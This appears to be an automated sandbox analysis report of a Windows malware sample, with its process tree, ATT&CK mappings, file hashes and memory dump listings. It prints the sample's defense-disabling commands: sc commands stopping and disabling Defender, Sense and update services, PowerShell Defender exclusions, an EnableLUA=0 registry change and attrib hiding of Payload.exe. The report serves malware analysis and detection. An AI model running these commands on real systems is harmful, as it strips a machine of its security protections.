PID 3780 wrote to memory of 1068	3780	cmd.exe	110
PID 3780 wrote to memory of 1060	3780	cmd.exe	111
PID 3780 wrote to memory of 1060	3780	cmd.exe	111
PID 3780 wrote to memory of 4888	3780	cmd.exe	112
PID 3780 wrote to memory of 4888	3780	cmd.exe	112
PID 3780 wrote to memory of 1724	3780	cmd.exe	113
PID 3780 wrote to memory of 1724	3780	cmd.exe	113
PID 3780 wrote to memory of 4156	3780	cmd.exe	114
PID 3780 wrote to memory of 4156	3780	cmd.exe	114
PID 3780 wrote to memory of 4308	3780	cmd.exe	115
PID 3780 wrote to memory of 4308	3780	cmd.exe	115
PID 3780 wrote to memory of 4900	3780	cmd.exe	116
PID 3780 wrote to memory of 4900	3780	cmd.exe	116
PID 3780 wrote to memory of 3836	3780	cmd.exe	117
PID 3780 wrote to memory of 3836	3780	cmd.exe	117
PID 3780 wrote to memory of 1064	3780	cmd.exe	118
PID 3780 wrote to memory of 1064	3780	cmd.exe	118
PID 3780 wrote to memory of 1736	3780	cmd.exe	119
PID 3780 wrote to memory of 1736	3780	cmd.exe	119
PID 3780 wrote to memory of 4712	3780	cmd.exe	120
PID 3780 wrote to memory of 4712	3780	cmd.exe	120
PID 3780 wrote to memory of 2372	3780	cmd.exe	121
PID 3780 wrote to memory of 2372	3780	cmd.exe	121
PID 3780 wrote to memory of 3248	3780	cmd.exe	122
PID 3780 wrote to memory of 3248	3780	cmd.exe	122
PID 3780 wrote to memory of 4020	3780	cmd.exe	123
PID 3780 wrote to memory of 4020	3780	cmd.exe	123
PID 3780 wrote to memory of 4164	3780	cmd.exe	124
PID 3780 wrote to memory of 4164	3780	cmd.exe	124
PID 3780 wrote to memory of 4744	3780	cmd.exe	125
PID 3780 wrote to memory of 4744	3780	cmd.exe	125
PID 3780 wrote to memory of 3708	3780	cmd.exe	126
PID 3780 wrote to memory of 3708	3780	cmd.exe	126
PID 3780 wrote to memory of 8	3780	cmd.exe	127
PID 3780 wrote to memory of 8	3780	cmd.exe	127
PID 3780 wrote to memory of 756	3780	cmd.exe	128
PID 3780 wrote to memory of 756	3780	cmd.exe	128
PID 4140 wrote to memory of 3416	4140	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	129
PID 4140 wrote to memory of 3416	4140	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe	129

System policy modification 1 TTPs 3 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Payload.exe

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4380	attrib.exe

C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2308
- C:\Users\Admin\AppData\Local\Temp\428e5a86-a663-4e00-af00-57a0ad1f12ba\AdvancedRun.exe
  "C:\Users\Admin\AppData\Local\Temp\428e5a86-a663-4e00-af00-57a0ad1f12ba\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\428e5a86-a663-4e00-af00-57a0ad1f12ba\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Users\Admin\AppData\Local\Temp\428e5a86-a663-4e00-af00-57a0ad1f12ba\AdvancedRun.exe
    "C:\Users\Admin\AppData\Local\Temp\428e5a86-a663-4e00-af00-57a0ad1f12ba\AdvancedRun.exe" /SpecialRun 4101d8 3516
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:804
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1792
- C:\Users\Admin\AppData\Local\Temp\d73a863f-6e3f-401c-892f-0c11f44ce8ab\94afe960-b036-4a52-9186-d75814ab07bc.exe
  "C:\Users\Admin\AppData\Local\Temp\d73a863f-6e3f-401c-892f-0c11f44ce8ab\94afe960-b036-4a52-9186-d75814ab07bc.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe" /WindowState ""1"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
  2⤵
  - Executes dropped EXE
  - Access Token Manipulation: Create Process with Token
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1636
- - C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe"
    3⤵
    - UAC bypass
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:4140
  - - C:\Windows\TEMP\8e54826b-6c16-4005-8ea9-5c118ceca156\AdvancedRun.exe
      "C:\Windows\TEMP\8e54826b-6c16-4005-8ea9-5c118ceca156\AdvancedRun.exe" /EXEFilename "C:\Windows\TEMP\8e54826b-6c16-4005-8ea9-5c118ceca156\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
      4⤵
      Executes dropped EXE
      Access Token Manipulation: Create Process with Token
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2916
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\TEMP\8e54826b-6c16-4005-8ea9-5c118ceca156\test.bat"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3780
      - C:\Windows\system32\sc.exe
        
        sc stop windefend
        6⤵
        Launches sc.exe
        
        PID:4372
      - C:\Windows\system32\sc.exe
        
        sc config windefend start= disabled
        6⤵
        Launches sc.exe
        
        PID:4396
      - C:\Windows\system32\sc.exe
        
        sc stop Sense
        6⤵
        Launches sc.exe
        
        PID:4924
      - C:\Windows\system32\sc.exe
        
        sc config Sense start= disabled
        6⤵
        Launches sc.exe
        
        PID:1068
      - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:1060
      - C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        6⤵
        Launches sc.exe
        
        PID:4888
      - C:\Windows\system32\sc.exe
        
        sc stop usosvc
        6⤵
        Launches sc.exe
        
        PID:1724
      - C:\Windows\system32\sc.exe
        
        sc config usosvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:4156
      - C:\Windows\system32\sc.exe
        
        sc stop WaasMedicSvc
        6⤵
        Launches sc.exe
        
        PID:4308
      - C:\Windows\system32\sc.exe
        
        sc config WaasMedicSvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:4900
      - C:\Windows\system32\sc.exe
        
        sc stop SecurityHealthService
        6⤵
        Launches sc.exe
        
        PID:3836
      - C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start= disabled
        6⤵
        Launches sc.exe
        
        PID:1064
      - C:\Windows\system32\sc.exe
        
        sc stop SDRSVC
        6⤵
        Launches sc.exe
        
        PID:1736
      - C:\Windows\system32\sc.exe
        
        sc config SDRSVC start= disabled
        6⤵
        Launches sc.exe
        
        PID:4712
      - C:\Windows\system32\sc.exe
        
        sc stop wscsvc
        6⤵
        Launches sc.exe
        
        PID:2372
      - C:\Windows\system32\sc.exe
        
        sc config wscsvc start= disabled
        6⤵
        Launches sc.exe
        
        PID:3248
      - C:\Windows\system32\sc.exe
        
        sc stop WdiServiceHost
        6⤵
        Launches sc.exe
        
        PID:4020
      - C:\Windows\system32\sc.exe
        
        sc config WdiServiceHost start= disabled
        6⤵
        Launches sc.exe
        
        PID:4164
      - C:\Windows\system32\sc.exe
        
        sc stop WdiSystemHost
        6⤵
        Launches sc.exe
        
        PID:4744
      - C:\Windows\system32\sc.exe
        
        sc config WdiSystemHost start= disabled
        6⤵
        Launches sc.exe
        
        PID:3708
      - C:\Windows\system32\sc.exe
        
        sc stop InstallService
        6⤵
        Launches sc.exe
        
        PID:8
      - C:\Windows\system32\sc.exe
        
        sc config InstallService Start= disabled
        6⤵
        Launches sc.exe
        
        PID:756
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3416
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe" -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1396
  - - C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe
      "C:\Users\Admin\AppData\Local\Temp\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe"
      4⤵
      Adds Run key to start application
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Modifies data under HKEY_USERS
      Suspicious use of AdjustPrivilegeToken
      PID:2720
    - - C:\Windows\Payload.exe
        
        "C:\Windows\Payload.exe"
        5⤵
        UAC bypass
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Checks whether UAC is enabled
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:4388
      - C:\Windows\TEMP\123f347f-122d-46fb-bb15-257b4b929f2a\AdvancedRun.exe
        
        "C:\Windows\TEMP\123f347f-122d-46fb-bb15-257b4b929f2a\AdvancedRun.exe" /EXEFilename "C:\Windows\TEMP\123f347f-122d-46fb-bb15-257b4b929f2a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
        6⤵
        Executes dropped EXE
        Access Token Manipulation: Create Process with Token
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3312
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Windows\TEMP\123f347f-122d-46fb-bb15-257b4b929f2a\test.bat"
        7⤵
        
        PID:2732
        
        C:\Windows\system32\sc.exe
        
        sc stop windefend
        8⤵
        Launches sc.exe
        
        PID:4580
        
        C:\Windows\system32\sc.exe
        
        sc config windefend start= disabled
        8⤵
        Launches sc.exe
        
        PID:1684
        
        C:\Windows\system32\sc.exe
        
        sc stop Sense
        8⤵
        Launches sc.exe
        
        PID:4120
        
        C:\Windows\system32\sc.exe
        
        sc config Sense start= disabled
        8⤵
        Launches sc.exe
        
        PID:1584
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:4900
        
        C:\Windows\system32\sc.exe
        
        sc config wuauserv start= disabled
        8⤵
        Launches sc.exe
        
        PID:3856
        
        C:\Windows\system32\sc.exe
        
        sc stop usosvc
        8⤵
        Launches sc.exe
        
        PID:2524
        
        C:\Windows\system32\sc.exe
        
        sc config usosvc start= disabled
        8⤵
        Launches sc.exe
        
        PID:4052
        
        C:\Windows\system32\sc.exe
        
        sc stop WaasMedicSvc
        8⤵
        Launches sc.exe
        
        PID:4100
        
        C:\Windows\system32\sc.exe
        
        sc config WaasMedicSvc start= disabled
        8⤵
        Launches sc.exe
        
        PID:2428
        
        C:\Windows\system32\sc.exe
        
        sc stop SecurityHealthService
        8⤵
        Launches sc.exe
        
        PID:4128
        
        C:\Windows\system32\sc.exe
        
        sc config SecurityHealthService start= disabled
        8⤵
        Launches sc.exe
        
        PID:1704
        
        C:\Windows\system32\sc.exe
        
        sc stop SDRSVC
        8⤵
        Launches sc.exe
        
        PID:4712
        
        C:\Windows\system32\sc.exe
        
        sc config SDRSVC start= disabled
        8⤵
        Launches sc.exe
        
        PID:2372
        
        C:\Windows\system32\sc.exe
        
        sc stop wscsvc
        8⤵
        Launches sc.exe
        
        PID:64
        
        C:\Windows\system32\sc.exe
        
        sc config wscsvc start= disabled
        8⤵
        Launches sc.exe
        
        PID:4628
        
        C:\Windows\system32\sc.exe
        
        sc stop WdiServiceHost
        8⤵
        Launches sc.exe
        
        PID:4436
        
        C:\Windows\system32\sc.exe
        
        sc config WdiServiceHost start= disabled
        8⤵
        Launches sc.exe
        
        PID:3436
        
        C:\Windows\system32\sc.exe
        
        sc stop WdiSystemHost
        8⤵
        Launches sc.exe
        
        PID:4552
        
        C:\Windows\system32\sc.exe
        
        sc config WdiSystemHost start= disabled
        8⤵
        Launches sc.exe
        
        PID:8
        
        C:\Windows\system32\sc.exe
        
        sc stop InstallService
        8⤵
        Launches sc.exe
        
        PID:4024
        
        C:\Windows\system32\sc.exe
        
        sc config InstallService Start= disabled
        8⤵
        Launches sc.exe
        
        PID:1604
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Payload.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3780
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Payload.exe" -Force
        6⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4084
      - C:\Windows\Payload.exe
        
        "C:\Windows\Payload.exe"
        6⤵
        Executes dropped EXE
        
        PID:768
    - - C:\Windows\SysWOW64\attrib.exe
        
        attrib +h +r +s "C:\Windows\Payload.exe"
        5⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Views/modifies file attributes
        
        PID:4380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Access Token Manipulation

T1134

Create Process with Token

T1134.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
d9d5661a883b51a61301630d8e55b876

SHA1
e26d7748eca9d7506cdc0c15e6c7921295ba096b

SHA256
b3735de670c06f6e555c532f7f5ec5aff0c15698e534937c03176537bda9986d

SHA512
aa3195937c7cd8603001e1e15e40c85f27e27b01700d8c1b99dcdca5aafeaf1f16f4bc3909e18b3e4fe329c89ebc0d73c6eaf41c7df9a50cf6c792821026223e

Download Submit
C:\Users\Admin\AppData\Local\Temp\428e5a86-a663-4e00-af00-57a0ad1f12ba\AdvancedRun.exe

Filesize
88KB

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kar3gsdv.5hq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Payload.exe

Filesize
337KB

MD5
e76822be6e7bf60c617c8d49133f444d

SHA1
5f45037213112c91ad51efda01930adf9748f56f

SHA256
2aaf93a1bc4f18d8f7eff1bcd204f0b1ec348e6f2d438a8f80b4934338903ee4

SHA512
224e9ddb781230ef3838a78489f195b0323dab8ce8ad20819eb6b87f4a5f8b4129a6abce44fefe367db41466cc5d2af9f07fb106a548312d2dc8fd3a2c0af865

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\e76822be6e7bf60c617c8d49133f444d_JaffaCakes118.exe.log

Filesize
886B

MD5
8265ec8df82cf997363c9cce922229ae

SHA1
560d5cdd6958b958aa7ec3321d7459d2a701656f

SHA256
c1f4f11b4ca2a07b3e666540e647608ef77493627ac736c048b91df10890ff27

SHA512
a37b2cb94daba27f8211dee9cc2cb8974f25c79ea10d8adad3e3f94d3ca33cd1007c795fd8656f3c6945be3d14276dfc4fcf37e5258badccb65d61390f138a94

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
e0fb0e2ba0d1f02986dde52096c2b6f2

SHA1
d27d959951e1a75287387c145d2314ac2d081d46

SHA256
4d5c6fdadc9fdac69a2cce7e1792525479a480337c9dac176fe66b1416f4108b

SHA512
cbdfedaeba4460cf921409343d6be88b164782dda5d221be74266e84a239a872ff152e1582e9ffc7da574fbb63c31b3fcd9e49fafc2e92432d532fa321236f6f

Download Submit
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
42c9780a7e8000dd9ab39a2320bf6ba5

SHA1
4298ba58594de357e35f9a134c025f5efff0b547

SHA256
88ee09b4e7bb29ddc6480095e3d4cac949df5c79139f179068caad7fb4ab89c5

SHA512
3c955fa73f1f6127c48936cec2e6b0d92431b07cd73b3c8bdceb307b22ad82ea3c5d161fa4998ee7ab4b5ac3941a0f3c591d920a63149ccae14df7aa91ff90bb

Download Submit
C:\Windows\TEMP\8e54826b-6c16-4005-8ea9-5c118ceca156\test.bat

Filesize
8KB

MD5
b2a5ef7d334bdf866113c6f4f9036aae

SHA1
f9027f2827b35840487efd04e818121b5a8541e0

SHA256
27426aa52448e564b5b9dff2dbe62037992ada8336a8e36560cee7a94930c45e

SHA512
8ed39ed39e03fa6d4e49167e8ca4823e47a221294945c141b241cfd1eb7d20314a15608da3fafc3c258ae2cfc535d3e5925b56caceee87acfb7d4831d267189e

Download Submit
memory/804-88-0x0000000007D00000-0x0000000007D0A000-memory.dmp

Filesize
40KB

Download
memory/804-91-0x0000000007EC0000-0x0000000007ECE000-memory.dmp

Filesize
56KB

Download
memory/804-33-0x00000000030B0000-0x00000000030E6000-memory.dmp

Filesize
216KB

Download
memory/804-35-0x0000000005B30000-0x0000000006158000-memory.dmp

Filesize
6.2MB

Download
memory/804-84-0x0000000006EF0000-0x0000000006F0E000-memory.dmp

Filesize
120KB

Download
memory/804-37-0x00000000062D0000-0x0000000006336000-memory.dmp

Filesize
408KB

Download
memory/804-38-0x0000000006340000-0x00000000063A6000-memory.dmp

Filesize
408KB

Download
memory/804-44-0x00000000063B0000-0x0000000006704000-memory.dmp

Filesize
3.3MB

Download
memory/804-94-0x0000000007FB0000-0x0000000007FB8000-memory.dmp

Filesize
32KB

Download
memory/804-93-0x0000000007FD0000-0x0000000007FEA000-memory.dmp

Filesize
104KB

Download
memory/804-74-0x0000000070700000-0x000000007074C000-memory.dmp

Filesize
304KB

Download
memory/804-90-0x0000000007E90000-0x0000000007EA1000-memory.dmp

Filesize
68KB

Download
memory/804-89-0x0000000007F10000-0x0000000007FA6000-memory.dmp

Filesize
600KB

Download
memory/804-87-0x0000000007C90000-0x0000000007CAA000-memory.dmp

Filesize
104KB

Download
memory/1396-149-0x0000000070030000-0x000000007007C000-memory.dmp

Filesize
304KB

Download
memory/1792-63-0x00000000061D0000-0x0000000006202000-memory.dmp

Filesize
200KB

Download
memory/1792-59-0x0000000006220000-0x000000000626C000-memory.dmp

Filesize
304KB

Download
memory/1792-86-0x00000000075D0000-0x0000000007C4A000-memory.dmp

Filesize
6.5MB

Download
memory/1792-85-0x0000000006C50000-0x0000000006CF3000-memory.dmp

Filesize
652KB

Download
memory/1792-36-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

Filesize
136KB

Download
memory/1792-64-0x0000000070700000-0x000000007074C000-memory.dmp

Filesize
304KB

Download
memory/1792-92-0x00000000071C0000-0x00000000071D4000-memory.dmp

Filesize
80KB

Download
memory/1792-58-0x0000000005C60000-0x0000000005C7E000-memory.dmp

Filesize
120KB

Download
memory/2308-62-0x00000000743F0000-0x0000000074BA0000-memory.dmp

Filesize
7.7MB

Download
memory/2308-0-0x00000000743FE000-0x00000000743FF000-memory.dmp

Filesize
4KB

Download
memory/2308-8-0x00000000051B0000-0x0000000005242000-memory.dmp

Filesize
584KB

Download
memory/2308-7-0x0000000004F50000-0x0000000004F6E000-memory.dmp

Filesize
120KB

Download
memory/2308-6-0x00000000743F0000-0x0000000074BA0000-memory.dmp

Filesize
7.7MB

Download
memory/2308-5-0x0000000004E20000-0x0000000004E78000-memory.dmp

Filesize
352KB

Download
memory/2308-4-0x0000000004FB0000-0x000000000504C000-memory.dmp

Filesize
624KB

Download
memory/2308-1-0x00000000004B0000-0x000000000050A000-memory.dmp

Filesize
360KB

Download
memory/2308-22-0x00000000743FE000-0x00000000743FF000-memory.dmp

Filesize
4KB

Download
memory/2308-2-0x0000000005360000-0x0000000005904000-memory.dmp

Filesize
5.6MB

Download
memory/2308-3-0x0000000004E90000-0x0000000004F06000-memory.dmp

Filesize
472KB

Download
memory/2720-177-0x0000000006410000-0x000000000641A000-memory.dmp

Filesize
40KB

Download
memory/2720-112-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/3416-159-0x00000000070A0000-0x00000000070B1000-memory.dmp

Filesize
68KB

Download
memory/3416-160-0x00000000070E0000-0x00000000070F4000-memory.dmp

Filesize
80KB

Download
memory/3416-138-0x0000000070030000-0x000000007007C000-memory.dmp

Filesize
304KB

Download
memory/3416-137-0x0000000005BB0000-0x0000000005BFC000-memory.dmp

Filesize
304KB

Download
memory/3416-124-0x00000000055B0000-0x0000000005904000-memory.dmp

Filesize
3.3MB

Download
memory/3416-148-0x0000000006E10000-0x0000000006EB3000-memory.dmp

Filesize
652KB

Download
memory/3780-192-0x0000000005AE0000-0x0000000005E34000-memory.dmp

Filesize
3.3MB

Download
memory/3780-213-0x0000000070340000-0x000000007038C000-memory.dmp

Filesize
304KB

Download
memory/3780-223-0x0000000007370000-0x0000000007413000-memory.dmp

Filesize
652KB

Download
memory/3780-234-0x00000000076D0000-0x00000000076E1000-memory.dmp

Filesize
68KB

Download
memory/3780-235-0x0000000007710000-0x0000000007724000-memory.dmp

Filesize
80KB

Download
memory/3780-212-0x00000000061A0000-0x00000000061EC000-memory.dmp

Filesize
304KB

Download
memory/4084-224-0x0000000070340000-0x000000007038C000-memory.dmp

Filesize
304KB

Download